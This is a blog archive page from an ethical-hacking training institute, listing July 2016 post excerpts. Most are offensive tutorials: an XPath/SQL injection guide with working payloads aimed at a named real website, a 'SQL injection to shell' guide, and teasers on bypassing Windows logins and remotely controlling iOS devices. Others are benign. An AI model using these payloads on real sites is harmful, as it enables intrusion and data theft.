Monthly Archives: July 2016

//July

Network Image Hack.

Ethical Hacking Institute in India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

So there might be a better way of doing this on windows but while I work on my project, this is the best you will get out of me.

You will need

Cain and abel http://www.oxid.it/cain.html
Wireshark https://www.wireshark.org/download.html

To start what you need to do is open Cain […]

By |July 31st, 2016|Hacking, Papers|

INVITATION FOR CYBER CRIME HELPLINE AWARD FUNCTION 2016

CYBER CRIME HELPLINE AWARD

 

We are consolidating “Cyber Crime Helpline Awards” on 31st July, 2016, on the occasion of Information Security Day (4th August) and we as a Cyber Crime Helpline would be felicitating some of the dignitaries who have been successfully helping or assisting to Government Agencies, Public Sectors, IT/ITES Industries, and Educational Organizations also […]

By |July 29th, 2016|CYBER CRIME HELPLINE, CYBER CRIME HELPLINE AWARD|

XPath Injection Practical Approach Guide

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

XPath Injection guide

Credits: Brother Downfall

Extract Value

I’ll be using this site as an example.

Code:
http://leadacidbatteryinfo.org/newsdetail.php?id=51

Version (ExtractValue)

Code:
+and+extractvalue(rand(),concat(0x7e,version()))–

This will return our XPATH Syntax error, and give us our version.
This is what my link looks like.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,version()))–

 

Code:
XPATH syntax error: ‘~5.1.52-log’

You should get your version.

Getting The Tables (Extract Value)

Code:
+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))–

My link […]

By |July 28th, 2016|XPath Injection|

(MySQL injection–Cross Site Scripting–File inclusion) Practical Approach Guide

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Table of Contents

Introduction
 
MySQL injection▸ How does MySQL injection work?
▸ How do our malicious queries get executed?

Cross Site Scripting▸ How does Cross Site Scripting work?
▸ How do our malicious vectors get executed?

File inclusion▸ How does Local & Remote File Inclusion work?
▸ How do we […]

By |July 27th, 2016|Papers|

SQL Injection to shell for beginners

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Mike

Hello Everyone,

Today, we will see how to upload a shell through SQL injection (+No needed an Admin Panel),

Requirements:

Vulnerable site.
Shell in txt format [Example: http://.com/shell.txt].
Your Brain (;

~~~
Firstly, we need to use order by statement to count the number of columns.
http://.com/index.php?id=1+order+by+1–
http://.com/index.php?id=1+order+by+2–
http://.com/index.php?id=1+order+by+3–
http://.com/index.php?id=1+order+by+4–
We […]

By |July 27th, 2016|Papers|

Bypass Windows Admin LogIn with a USB

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

I’m going to be showing you a way to bypass a administrator login on a Windows computer.

All that you will need is a USB and Kon-Boot, which can be easily found online.

Step 1: Download the zip folder containing Kon-Boot and extract it to […]

By |July 26th, 2016|Papers|

HACK ANY IOS DEVICE

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Brother Plethora

Hey guys! Today I will be sharing a unique method of monitoring and controlling any IOS device remotely from your PC or pretty much any device that can run a browser.

Supplies needed:

– Target device running any IOS version above 5.0
– Computer
– 5 minutes […]

By |July 26th, 2016|Papers|

19 Best Hidden iPhone Secret Codes In 2016

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

About 25 percent of iPhone users are hardcore, they really dig out more and more information relating to their iPhone and they do experiments with their iPhone as well, but average iPhone users really don’t care or don’t want to do experiments with […]

By |July 24th, 2016|Papers|

Here is How To Install Chrome On Kali Linux Without Errors

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

If you are someone who wants to use Kali Linux as your main operating system, the most common issue you face initially in lacking of a good browser. The default browser in Kali Linux is iceweasel which is a forked version of Firefox. […]

By |July 24th, 2016|Papers|

A Beginner’s Guide To Frame Relay In Computer Networks

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Frame Relay is a WAN protocol that operates at the physical layer and data link layer of the OSI reference model. The main purpose of designing the Frame Relay was to use this technology across Integrated Services Digital Network (ISDN) interfaces. However, with […]

By |July 23rd, 2016|Papers|